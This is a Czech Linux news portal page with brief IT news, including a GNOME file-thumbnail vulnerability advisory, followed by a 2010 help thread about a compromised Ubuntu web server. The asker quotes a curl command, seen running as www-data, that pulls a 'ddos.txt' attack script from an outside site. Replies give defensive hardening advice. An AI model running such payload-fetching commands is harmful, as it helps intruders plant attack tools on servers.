abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×

dnes 13:11 | Pozvánky

Spolek OpenAlt zve příznivce otevřeného přístupu na 142. brněnský sraz, který proběhne v pátek 21. července od 18:00 hodin ve Sport Centru Srbská (Srbská 4). Od 19:00 je pro zájemce zamluveno hřiště na plážový volejbal.

Ladislav Hagara | Komentářů: 0
dnes 12:34 | Bezpečnostní upozornění

V GNOME Soubory, původně Nautilus, konkrétně v generování náhledů exe, msi, dll a lnk souborů byla nalezena a opravena bezpečnostní chyba CVE-2017-11421 s názvem Bad Taste. Při otevření složky obsahující tyto soubory může být spuštěn VBScript obsažen v názvech těchto souborů.

Ladislav Hagara | Komentářů: 1
dnes 11:00 | Bezpečnostní upozornění

Společnost Oracle vydala čtvrtletní bezpečnostní aktualizaci svých softwarových produktů (CPU, Critical Patch Update). Opraveno bylo celkově 308 bezpečnostních chyb. V Oracle Java SE je například opraveno 32 bezpečnostních chyb. Vzdáleně zneužitelných bez autentizace je 28 z nich. V Oracle MySQL je opraveno 30 bezpečnostních chyb. Vzdáleně zneužitelných bez autentizace je 9 z nich.

Ladislav Hagara | Komentářů: 0
dnes 01:00 | Komunita

Mark Krenz, známý svým twitterovým účtem @climagic (Command Line Magic), kde ukazuje, co vše a jak lze dělat v příkazovém řádku, přednášel včera v Praze. Záznam přednášky je k dispozici na YouTube.

Ladislav Hagara | Komentářů: 0
včera 10:00 | Nová verze

Microsoft vydal Skype pro Linux ve verzi 5.4 Beta. Nejnovější Skype pro Linux je postaven na frameworku Electron 1.7.4 a přináší skupinové videohovory.

Ladislav Hagara | Komentářů: 11
včera 06:00 | Nová verze

Werner Koch, zakladatel a hlavní vývojář GnuPG, oznámil vydání verze 1.8.0 svobodné kryptografické knihovny Libgcrypt. Jedná se o první stabilní verzi nové řady 1.8. Ta je API i ABI kompatibilní s řadou 1.7. Z novinek vývojáři zdůrazňují podporu kryptografických hašovacích funkcí Blake2 (Wikpedie), šifrovací mód XTS nebo zvýšení výkonu na architektuře ARM.

Ladislav Hagara | Komentářů: 0
18.7. 15:55 | Zajímavý projekt

Stefan Vorkoetter představil na svých stránkách DIY tablet s Raspberry Pi 3 Model B. Z Raspberry Pi odstranil USB porty, ethernetový port i GPIO konektor. Použil oficiální sedmipalcový dotykový displej s rozlišením 800x480 pixelů. Hmotnost tabletu je 484  g.

Ladislav Hagara | Komentářů: 6
18.7. 06:00 | Zajímavý projekt

Podpořit vývoj otevřených technologií pro rozpoznávaní řeči lze na stránkách Common Voice. Jedná se o projekt Mozilly, jehož prvním cílem je nahrání a následné zveřejnění pod open source licencí 10 000 hodin záznamů řeči. Pomoci může kdokoli. Stačí na stránkách projektu do mikrofonu přečíst napsaný text nebo si nechat přehrávat již nahrané záznamy a určovat, zda napsaným textům odpovídají. Podrobnosti v často kladených otázkách (FAQ).

Ladislav Hagara | Komentářů: 4
18.7. 05:00 | IT novinky

Do pátku probíhá v Praze IETF 99, tj. 99. setkání organizace Internet Engineering Task Force (IETF) odpovědné za tvorbu internetových standardů RFC (Request for Comments). Vybrané přednášky a jednání lze sledovat online. Záznamy jsou k dispozici na YouTube. Těsně před setkáním bylo vydáno RFC 8200 nahrazující RFC 2460 a po více než 18 letech standardizující IPv6 (STD 86).

Ladislav Hagara | Komentářů: 0
18.7. 00:33 | Nová verze

Byl spuštěn další Humble Book Bundle. Tentokrát jsou v nabídce elektronické knihy věnované kybernetické bezpečnosti od vydavatelství Wiley. Všech 14 knih lze koupit za 15 dolarů.

Ladislav Hagara | Komentářů: 0
Chystáte se pořídit CPU AMD Ryzen?
 (7%)
 (31%)
 (1%)
 (10%)
 (43%)
 (8%)
Celkem 1023 hlasů
 Komentářů: 65, poslední 1.6. 19:16
    Rozcestník

    Dotaz: DDOS?? (urgent)

    10.8.2010 01:31 Martin
    DDOS?? (urgent)
    Přečteno: 438×
    Čus chlapi. Jsem začátečník a mám vlastní webserver s ubuntu 9.10. Ted se mi však často stává že se systém přetíží natolik že se nezapne ani LCD. Občas se mi povede chytnout dobrou chvilku a vidim tam ty žrouty: (výpis z webmina) ID USER CPU PŘÍKAZ 9422 www-data 46.3 % /sbin/syslogd 9429 www-data 27.8 % /sbin/klogd -c 1 -x -x 9427 www-data 26.0 % /sbin/syslogd

    No a právě teď jsem tam na chvíli zachytl proces pod tímto příkazem: curl -O http://www.salsayson.com/logs/ddos.txt -O ddos.txt

    Spuštěné to bylo pod www-data. Můžete mi pomoci? Jakou ochranu nasadit na server? Už tam mám firewall, nastavený dokonce i s dhcp. Ale přesto to přes něj projde :( Opravdu jsem ještě neznalý...

    Díky moc

    Odpovědi

    Jendа avatar 10.8.2010 02:31 Jendа | skóre: 73 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Máš tam záškodníka. Ale běží pod www-data, tzn. asi se mu nepodařilo získat roota (to bys ho třeba ani neviděl). Tipnul bych si, že hostuješ nějakou děravou PHP aplikaci, která umožňuje cizím lidem spouštět externí programy (v tomto případě v Perlu).
    10.8.2010 04:14 Martin
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    běží tam wordpress, e107, phpbb, oxid eshop. Web s e107 již potíže byli. Dokonce jsem musel několikrát nahrazovat celý root adresář. Na serveru mi také občas mizí obrázky (ze všech cms). Většinou to bývají loga.
    10.8.2010 08:57 NN
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Mam napad pokud jiz nemas "suhosin" pro PHP..

    NN
    10.8.2010 09:10 none
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Pomerne bezna situace. Je potreba zjistit jakou dirou se tam dostava. Nic sloziteho to nebude, nejspis neco v php (obligatni 'include $file' apod. Hledej v logach souvisejicich s tim zaznamem co jsi posilal (podle ip adresy, nazvu souboru apod.). Pokud ten proces bezi, najdes ho v /proc a uvidis i odkud byl spusten. A kdyz uz vis jak to funguje, tak musis vhodne nastavit apache/php/system tak, aby k tomu nemohlo dojit. Opravovat skript php, ktery je takhle deravy je neproduktivni, protoze jich bude pravdepodobne deravych vic a je jen otazkou casu, kdy se to bude opakovat. Nadruhou stranu nechat tam tu diru je taky hrich. Takze jednak opravit php skripty a jednak nakonfiguraovat prostredi tak, aby k tomu nemohlo dochazet. V php zakazat vsechny potencialne nebezpecne funkce (exec, system etc.), kazdemu hostingu dat jineho uzivatele s prislusnymi pravy a tak dale. Neni to jednoduche a neni to neprustrelne, bohuzel. Ale drtivou vetsinu tech utoku eliminujes. Prinejmensim tech robotickych.

    Jojo, provozovat LAMP/LAPP (a vubec jakykoliv) server neni pro kazdeho, je treba neco umet a znat system ktery pouzivas. Pockej az prijdou ucty za datovy prenos, stiznosti na spam na utoky apod. Vyplati se tomu rozumnet nebo to nechat odbornikum ;). Za par stovek ti ten server muze nekdo spravovat a mas klid.
    10.8.2010 12:18 Šangala | skóre: 56 | blog: Dutá Vrba - Wally
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Většina byla již popsána, jen doplním, že před přetížením Vás mohou zachránit limity s vhodným nastavením. Potom se aspoň na ten server pravděpodobně lehce dostanete a může analyzovat a napravovat…
    To, že trpíš stihomamem, ještě neznamená, že po tobě nejdou. ⰞⰏⰉⰓⰀⰜⰉ ⰗⰞⰅⰜⰘ ⰈⰅⰏⰉ ⰒⰑⰎⰉⰁⰕⰅ ⰏⰉ ⰒⰓⰄⰅⰎ ·:⁖⁘⁙†
    11.8.2010 07:50 Martin
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Takže mam v ubuntu vytvořit klasickýho uživatele a pak tomu uživateli přidělit root adresář webu? V tý e107 jsem dělal nějaké úpravy, takže sem možná někde nechal chmod 777. To bude určitě ono že? :) Systému ještě moc nerozumim, hlavně struktuře souborů, oprávnění a jejich smysl :D
    11.8.2010 10:29 alkoholik | skóre: 35 | blog: Alkoholik
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    A co si o tom alespon neco malo precist?

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.